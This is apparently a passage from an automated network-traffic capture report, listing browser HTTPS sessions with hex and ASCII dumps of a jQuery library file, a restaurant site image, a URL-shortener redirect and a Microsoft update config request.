                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 6c 93 65 2b 9c a8 ef a1 dd dc 46 a7 f9 7c 1e 39 fd 05 1e bf e5 7e b4 2e d9 36 3b 22 19 0d 18 06 8f 8f d6 18 ad 45 9c 5a d4 f4 06 39 fb 8e 59 ae 7e ce 04 17 5f b0 9d 46 b2 01 a5 25 42 08 b4 8e 28 8a 1a c4 0a ca ac 72 ff 03 27 58 3c b6 c2 db df 7e 05 cd 99 8c a2 9a 40 47 6d 9c 51 b4 f2 98 b4 4c 88 13 49 51 81 0f 33 54 21 a3 f6 05 ba 4c b9 70 67 9b b9 a0 38 fc 70 c5 b9 cf 14 e0 e4 5f c4 b5 c2 4d 84 bf 2c 84 27 d8 ff 1f 00 5a aa 6f 4c 88 1e 5b 0a 48 a4 88 3e ee ac bd d6 c9 1a 21 c6 9e 15 51 94 8e 0b 88 20 c6 9c 63 a9 91 71 83 c4 04 6c 63 1a 1d 75 51 a1 c4 d6 43 5c 9d 8f e3 a4 1a 7b c1 49 61 50 7a 6c aa 28 c7 d6 43 b8 50 52 d8 11 c1 57 80 46 07 d0 32 20 68 90 18 0d 62 84 20 80 73 78 57 20 71 e3 42 d5 59 82 10 c8 b8 89 96 16 a9 04 2a 08 d4 df 3f 45 74 8c 10 11
                                                                                                                                                    Data Ascii: le+F|9~.6;"EZ9Y~_F%B(r'X<~@GmQLIQ3T!Lpg8p_M,'ZoL[H>!Q cqlcuQC\{IaPzl(CPRWF2 hb sxW qBY*?Et
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 7c 5d 63 d3 82 2c cd a0 d2 d8 de 31 fc d3 af c1 e9 f7 f0 1a 3e a2 3f 40 61 10 f3 31 da 2e a0 d2 8b b7 24 08 ce bc 9e 1b 93 21 a3 67 3f 4a 67 b0 46 18 77 d9 dd dc a6 db 08 68 b7 3c 32 3d 26 b5 05 a9 52 14 59 ce 6c 9c e2 27 1d 92 a8 49 3d 9d 92 94 33 14 05 a5 1f a1 84 83 17 44 54 75 89 ad 2b a4 0e e9 74 22 a4 5f b3 b9 7b 88 1f 34 98 8c 0f d9 be b5 4f dc 5c 26 74 7d e4 e1 e1 92 2c cd cf ca 52 cf c8 4a 1e fc be 57 29 39 3e fd a1 5f c1 1a 4b 50 4e fe 9e 57 4c 8f 5a 02 82 b8 8b 6d ae 61 db ab 18 2b 98 4d 27 0b d7 4d ab 17 46 31 45 46 5c 66 94 69 c5 cc 69 f1 ba 6f fb 3e de f1 be bf 42 f7 c8 19 a6 93 43 64 59 20 6c 4c e8 b7 09 3d 1f 3f 6c 63 dc 8a 83 9b 1f 21 3a bc 4a db 8d c0 f7 71 94 87 83 a5 2a a6 58 93 2d a6 4a e5 9c 7c 96 92 34 3b e0 fa 38 ae 22 f6 35 b3 74
                                                                                                                                                    Data Ascii: |]c,1>?@a1.$!g?JgFwh<2=&RYl'I=3DTu+t"_{4O\&t},RJW)9>_KPNWLZma+M'MF1EF\fiio>BCdY lL=?lc!:Jq*X-J|4;8"5t
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 29 8e 1f 50 6b 83 df 68 60 e3 3e 99 db a0 cc 0e 71 a5 c6 b3 9a d0 2a 74 56 30 dd 1b 23 b3 12 d7 77 30 51 84 70 42 52 53 63 e6 7b 94 e5 84 38 71 31 f5 01 ae 88 81 84 dc 08 08 42 8c ce 51 ba a2 36 87 8b 13 38 3e 81 68 d1 58 eb 73 70 f5 02 1f fc a9 9f 63 f5 78 87 a3 c7 fb 88 e9 16 49 68 a8 4b c9 7c 3c 21 50 8a 95 23 ab 44 cd 06 07 87 63 26 07 73 96 4f 9f 20 cb 67 ec 4f 0e 58 5d 59 65 67 ef 80 1a 4b 72 ea 04 5e 2d 70 0b 8d 63 e6 14 55 46 ef cc dd dc ff 26 c5 63 8f 7c 86 3f b5 f6 2e 8c 6a a0 bd 19 2a ec 32 b1 0d 72 53 12 27 2d c4 74 93 2b 57 ce 73 e4 f4 1d 2c 1d 3b 4d 56 cd 90 be 8b 91 5d fc 4e 49 b9 7f 81 b2 ff 5a f6 65 4a 98 ed a1 da 27 99 ce 86 34 19 d1 ea 46 8c 76 2e f3 f1 0f 7d 8a cd f3 37 39 77 f7 6b 39 f9 6d 6f a5 b3 7e 12 d1 5a c1 75 43 94 94 d4 d6 62
                                                                                                                                                    Data Ascii: )Pkh`>q*tV0#w0QpBRSc{8q1BQ68>hXspcxIhK|<!P#Dc&sO gOX]YegKr^-pcUF&c|?.j*2rS'-t+Ws,;MV]NIZeJ'4Fv.}79wk9mo~ZuCb
                                                                                                                                                    2024-10-01 04:26:27 UTC8556INData Raw: 16 8b 0b 38 12 ba 52 21 8c 44 c1 f1 60 3e 49 a0 10 81 59 aa 99 85 60 69 ac fd 98 93 d4 63 65 86 39 ce 77 ee 39 2e 58 8c cc 60 4c 97 68 e1 0e ca 6e 85 46 e9 6c 92 dc 46 6c bb 86 9b 3e 8a 5f e8 43 a8 16 36 6d b3 b0 af 45 7e b8 46 bb db a2 31 7b 84 0b 2f 3e 87 81 a7 be 9e 36 21 b7 7d fc 2f 69 ed 1d e7 f4 b3 37 50 18 1d a3 71 ff 4d 54 1e 3c 4c 32 58 64 ba d3 a0 a4 73 4c cc 74 39 7b ed e9 cc ee 5e c4 f1 f3 fc af bf fe 33 e6 47 8a 7c fb db df c2 5b 98 27 e8 1f c5 d5 2e 8b cd 1a 1d e2 57 7a 7e ee d0 32 a7 08 c2 fc e7 05 b4 74 7e 3c a9 5f 0a 41 47 b8 2f 49 4d 7e 7b d0 ea ae 69 d9 10 6b ed 92 bf 8a 20 08 32 c8 62 1f 2d 13 13 47 6d 4c 2a 7b 03 02 95 72 ec 86 4d 4c 80 b0 3e 09 05 b4 ee 92 e4 1a 74 92 3a 6e d2 a6 e0 b8 a4 51 8e 30 12 08 2f 22 37 50 a1 ed b7 50 99 3c
                                                                                                                                                    Data Ascii: 8R!D`>IY`ice9w9.X`LhnFlFl>_C6mE~F1{/>6!}/i7PqMT<L2XdsLt9{^3G|['.Wz~2t~<_AG/IM~{ik 2b-GmL*{rML>t:nQ0/"7PP<


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    11192.168.2.449753162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:26 UTC586OUTGET /assets/vendors/jquery/jquery-3.4.1.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:26 UTC280INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 280364
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:26 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 34 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 39 2d 30 35 2d 30 31 54 32 31
                                                                                                                                                    Data Ascii: /*! * jQuery JavaScript Library v3.4.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2019-05-01T21
                                                                                                                                                    2024-10-01 04:26:27 UTC6016INData Raw: 20 43 53 53 20 65 73 63 61 70 65 73 0a 09 2f 2f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 43 53 53 32 31 2f 73 79 6e 64 61 74 61 2e 68 74 6d 6c 23 65 73 63 61 70 65 64 2d 63 68 61 72 61 63 74 65 72 73 0a 09 72 75 6e 65 73 63 61 70 65 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 2d 66 5d 7b 31 2c 36 7d 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 3f 7c 28 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 29 7c 2e 29 22 2c 20 22 69 67 22 20 29 2c 0a 09 66 75 6e 65 73 63 61 70 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 5f 2c 20 65 73 63 61 70 65 64 2c 20 65 73 63 61 70 65 64 57 68 69 74 65 73 70 61 63 65 20 29 20 7b 0a 09 09 76 61 72 20 68 69 67 68 20 3d 20 22 30 78 22 20 2b 20 65 73 63 61
                                                                                                                                                    Data Ascii: CSS escapes// http://www.w3.org/TR/CSS21/syndata.html#escaped-charactersrunescape = new RegExp( "\\\\([\\da-f]{1,6}" + whitespace + "?|(" + whitespace + ")|.)", "ig" ),funescape = function( _, escaped, escapedWhitespace ) {var high = "0x" + esca
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 3d 3d 20 65 78 70 61 6e 64 6f 20 29 20 7b 0a 09 09 09 09 09 09 63 6f 6e 74 65 78 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 20 22 69 64 22 20 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 41 6c 6c 20 6f 74 68 65 72 73 0a 09 72 65 74 75 72 6e 20 73 65 6c 65 63 74 28 20 73 65 6c 65 63 74 6f 72 2e 72 65 70 6c 61 63 65 28 20 72 74 72 69 6d 2c 20 22 24 31 22 20 29 2c 20 63 6f 6e 74 65 78 74 2c 20 72 65 73 75 6c 74 73 2c 20 73 65 65 64 20 29 3b 0a 7d 0a 0a 2f 2a 2a 0a 20 2a 20 43 72 65 61 74 65 20 6b 65 79 2d 76 61 6c 75 65 20 63 61 63 68 65 73 20 6f 66 20 6c 69 6d 69 74 65 64 20 73 69 7a 65 0a 20 2a 20 40 72 65 74 75 72 6e 73 20 7b 66 75 6e 63 74 69 6f 6e 28 73 74 72 69 6e 67 2c 20 6f 62 6a 65 63
                                                                                                                                                    Data Ascii: == expando ) {context.removeAttribute( "id" );}}}}}// All othersreturn select( selector.replace( rtrim, "$1" ), context, results, seed );}/** * Create key-value caches of limited size * @returns {function(string, objec
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 09 09 7d 0a 0a 09 09 2f 2f 20 53 6f 72 74 20 6f 6e 20 6d 65 74 68 6f 64 20 65 78 69 73 74 65 6e 63 65 20 69 66 20 6f 6e 6c 79 20 6f 6e 65 20 69 6e 70 75 74 20 68 61 73 20 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 0a 09 09 76 61 72 20 63 6f 6d 70 61 72 65 20 3d 20 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 20 2d 20 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 0a 09 09 69 66 20 28 20 63 6f 6d 70 61 72 65 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 63 6f 6d 70 61 72 65 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 43 61 6c 63 75 6c 61 74 65 20 70 6f 73 69 74 69 6f 6e 20 69 66 20 62 6f 74 68 20 69 6e 70 75 74 73 20 62 65 6c 6f 6e 67 20 74 6f 20 74 68 65 20 73 61 6d 65 20
                                                                                                                                                    Data Ascii: }// Sort on method existence if only one input has compareDocumentPositionvar compare = !a.compareDocumentPosition - !b.compareDocumentPosition;if ( compare ) {return compare;}// Calculate position if both inputs belong to the same
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 6d 65 2e 22 0a 09 09 2f 2f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 73 65 6c 65 63 74 6f 72 73 2f 23 6c 61 6e 67 2d 70 73 65 75 64 6f 0a 09 09 22 6c 61 6e 67 22 3a 20 6d 61 72 6b 46 75 6e 63 74 69 6f 6e 28 20 66 75 6e 63 74 69 6f 6e 28 20 6c 61 6e 67 20 29 20 7b 0a 09 09 09 2f 2f 20 6c 61 6e 67 20 76 61 6c 75 65 20 6d 75 73 74 20 62 65 20 61 20 76 61 6c 69 64 20 69 64 65 6e 74 69 66 69 65 72 0a 09 09 09 69 66 20 28 20 21 72 69 64 65 6e 74 69 66 69 65 72 2e 74 65 73 74 28 6c 61 6e 67 20 7c 7c 20 22 22 29 20 29 20 7b 0a 09 09 09 09 53 69 7a 7a 6c 65 2e 65 72 72 6f 72 28 20 22 75 6e 73 75 70 70 6f 72 74 65 64 20 6c 61 6e 67 3a 20 22 20 2b 20 6c 61 6e 67 20 29 3b 0a 09 09 09 7d 0a 09 09 09 6c 61 6e 67 20 3d 20 6c 61 6e 67 2e 72 65 70
                                                                                                                                                    Data Ascii: me."// http://www.w3.org/TR/selectors/#lang-pseudo"lang": markFunction( function( lang ) {// lang value must be a valid identifierif ( !ridentifier.test(lang || "") ) {Sizzle.error( "unsupported lang: " + lang );}lang = lang.rep
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 0a 09 09 09 09 09 09 77 68 69 6c 65 20 28 20 69 2d 2d 20 29 20 7b 0a 09 09 09 09 09 09 09 69 66 20 28 20 21 28 75 6e 6d 61 74 63 68 65 64 5b 69 5d 20 7c 7c 20 73 65 74 4d 61 74 63 68 65 64 5b 69 5d 29 20 29 20 7b 0a 09 09 09 09 09 09 09 09 73 65 74 4d 61 74 63 68 65 64 5b 69 5d 20 3d 20 70 6f 70 2e 63 61 6c 6c 28 20 72 65 73 75 6c 74 73 20 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 2f 2f 20 44 69 73 63 61 72 64 20 69 6e 64 65 78 20 70 6c 61 63 65 68 6f 6c 64 65 72 20 76 61 6c 75 65 73 20 74 6f 20 67 65 74 20 6f 6e 6c 79 20 61 63 74 75 61 6c 20 6d 61 74 63 68 65 73 0a 09 09 09 09 09 73 65 74 4d 61 74 63 68 65 64 20 3d 20 63 6f 6e 64 65 6e 73 65 28 20 73 65 74 4d 61 74 63 68 65 64 20 29 3b 0a 09 09 09
                                                                                                                                                    Data Ascii: while ( i-- ) {if ( !(unmatched[i] || setMatched[i]) ) {setMatched[i] = pop.call( results );}}}// Discard index placeholder values to get only actual matchessetMatched = condense( setMatched );
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 09 7d 0a 0a 09 09 09 2f 2f 20 52 65 76 65 72 73 65 20 6f 72 64 65 72 20 66 6f 72 20 70 61 72 65 6e 74 73 2a 20 61 6e 64 20 70 72 65 76 2d 64 65 72 69 76 61 74 69 76 65 73 0a 09 09 09 69 66 20 28 20 72 70 61 72 65 6e 74 73 70 72 65 76 2e 74 65 73 74 28 20 6e 61 6d 65 20 29 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 65 64 2e 72 65 76 65 72 73 65 28 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 20 6d 61 74 63 68 65 64 20 29 3b 0a 09 7d 3b 0a 7d 20 29 3b 0a 76 61 72 20 72 6e 6f 74 68 74 6d 6c 77 68 69 74 65 20 3d 20 28 20 2f 5b 5e 5c 78 32 30 5c 74 5c 72 5c 6e 5c 66 5d 2b 2f 67 20 29 3b 0a 0a 0a 0a 2f 2f 20 43 6f 6e 76 65 72 74 20 53 74 72 69 6e 67 2d 66 6f 72 6d 61 74 74 65 64 20 6f 70 74 69 6f
                                                                                                                                                    Data Ascii: }// Reverse order for parents* and prev-derivativesif ( rparentsprev.test( name ) ) {matched.reverse();}}return this.pushStack( matched );};} );var rnothtmlwhite = ( /[^\x20\t\r\n\f]+/g );// Convert String-formatted optio
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 6d 61 73 74 65 72 2e 72 65 6a 65 63 74 20 29 3b 0a 09 09 7d 0a 0a 09 09 72 65 74 75 72 6e 20 6d 61 73 74 65 72 2e 70 72 6f 6d 69 73 65 28 29 3b 0a 09 7d 0a 7d 20 29 3b 0a 0a 0a 2f 2f 20 54 68 65 73 65 20 75 73 75 61 6c 6c 79 20 69 6e 64 69 63 61 74 65 20 61 20 70 72 6f 67 72 61 6d 6d 65 72 20 6d 69 73 74 61 6b 65 20 64 75 72 69 6e 67 20 64 65 76 65 6c 6f 70 6d 65 6e 74 2c 0a 2f 2f 20 77 61 72 6e 20 61 62 6f 75 74 20 74 68 65 6d 20 41 53 41 50 20 72 61 74 68 65 72 20 74 68 61 6e 20 73 77 61 6c 6c 6f 77 69 6e 67 20 74 68 65 6d 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 76 61 72 20 72 65 72 72 6f 72 4e 61 6d 65 73 20 3d 20 2f 5e 28 45 76 61 6c 7c 49 6e 74 65 72 6e 61 6c 7c 52 61 6e 67 65 7c 52 65 66 65 72 65 6e 63 65 7c 53 79 6e 74 61 78 7c 54 79 70 65 7c 55 52
                                                                                                                                                    Data Ascii: master.reject );}return master.promise();}} );// These usually indicate a programmer mistake during development,// warn about them ASAP rather than swallowing them by default.var rerrorNames = /^(Eval|Internal|Range|Reference|Syntax|Type|UR
                                                                                                                                                    2024-10-01 04:26:27 UTC10368INData Raw: 69 74 68 69 6e 54 72 65 65 20 6d 69 67 68 74 20 62 65 20 63 61 6c 6c 65 64 20 66 72 6f 6d 20 6a 51 75 65 72 79 23 66 69 6c 74 65 72 20 66 75 6e 63 74 69 6f 6e 3b 0a 09 09 2f 2f 20 69 6e 20 74 68 61 74 20 63 61 73 65 2c 20 65 6c 65 6d 65 6e 74 20 77 69 6c 6c 20 62 65 20 73 65 63 6f 6e 64 20 61 72 67 75 6d 65 6e 74 0a 09 09 65 6c 65 6d 20 3d 20 65 6c 20 7c 7c 20 65 6c 65 6d 3b 0a 0a 09 09 2f 2f 20 49 6e 6c 69 6e 65 20 73 74 79 6c 65 20 74 72 75 6d 70 73 20 61 6c 6c 0a 09 09 72 65 74 75 72 6e 20 65 6c 65 6d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 3d 3d 20 22 6e 6f 6e 65 22 20 7c 7c 0a 09 09 09 65 6c 65 6d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 3d 3d 20 22 22 20 26 26 0a 0a 09 09 09 2f 2f 20 4f 74 68 65 72 77 69 73 65 2c 20 63 68 65 63 6b 20
                                                                                                                                                    Data Ascii: ithinTree might be called from jQuery#filter function;// in that case, element will be second argumentelem = el || elem;// Inline style trumps allreturn elem.style.display === "none" ||elem.style.display === "" &&// Otherwise, check
                                                                                                                                                    2024-10-01 04:26:27 UTC16384INData Raw: 6c 65 6d 20 3d 3d 3d 20 73 61 66 65 41 63 74 69 76 65 45 6c 65 6d 65 6e 74 28 29 20 29 20 3d 3d 3d 20 28 20 74 79 70 65 20 3d 3d 3d 20 22 66 6f 63 75 73 22 20 29 3b 0a 7d 0a 0a 2f 2f 20 53 75 70 70 6f 72 74 3a 20 49 45 20 3c 3d 39 20 6f 6e 6c 79 0a 2f 2f 20 41 63 63 65 73 73 69 6e 67 20 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 20 63 61 6e 20 74 68 72 6f 77 20 75 6e 65 78 70 65 63 74 65 64 6c 79 0a 2f 2f 20 68 74 74 70 73 3a 2f 2f 62 75 67 73 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 74 69 63 6b 65 74 2f 31 33 33 39 33 0a 66 75 6e 63 74 69 6f 6e 20 73 61 66 65 41 63 74 69 76 65 45 6c 65 6d 65 6e 74 28 29 20 7b 0a 09 74 72 79 20 7b 0a 09 09 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3b 0a 09 7d
                                                                                                                                                    Data Ascii: lem === safeActiveElement() ) === ( type === "focus" );}// Support: IE <=9 only// Accessing document.activeElement can throw unexpectedly// https://bugs.jquery.com/ticket/13393function safeActiveElement() {try {return document.activeElement;}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    12192.168.2.44975569.162.95.44435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:27 UTC341OUTGET /eWD0j3 HTTP/1.1
                                                                                                                                                    Host: cuturls.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:27 UTC360INHTTP/1.1 302 Found
                                                                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                                                                    connection: close
                                                                                                                                                    content-length: 11
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:27 GMT
                                                                                                                                                    location: http://ww1.cuturls.net
                                                                                                                                                    server: Cowboy
                                                                                                                                                    set-cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f; path=/; domain=.cuturls.net; expires=Sun, 19 Oct 2092 07:40:34 GMT; max-age=2147483647; secure; HttpOnly
                                                                                                                                                    2024-10-01 04:26:27 UTC11INData Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                                                                    Data Ascii: Redirecting


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    13192.168.2.449749184.28.90.27443
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:27 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                    2024-10-01 04:26:27 UTC467INHTTP/1.1 200 OK
                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    Server: ECAcc (lpl/EF06)
                                                                                                                                                    X-CID: 11
                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                    X-Ms-Region: prod-neu-z1
                                                                                                                                                    Cache-Control: public, max-age=217163
                                                                                                                                                    Date: Tue, 01 Oct 2024 04:26:27 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    X-CID: 2


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    14192.168.2.449757162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:27 UTC651OUTGET /assets/imgs/main.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/foodhut.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:29 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:27 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 85678
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:27 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: ff d8 ff e1 21 c3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 02 a6 00 00 01 01 00 03 00 00 00 01 01 c4 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 32 31 3a 35 36 3a 31 30 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: !ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 21:56:10
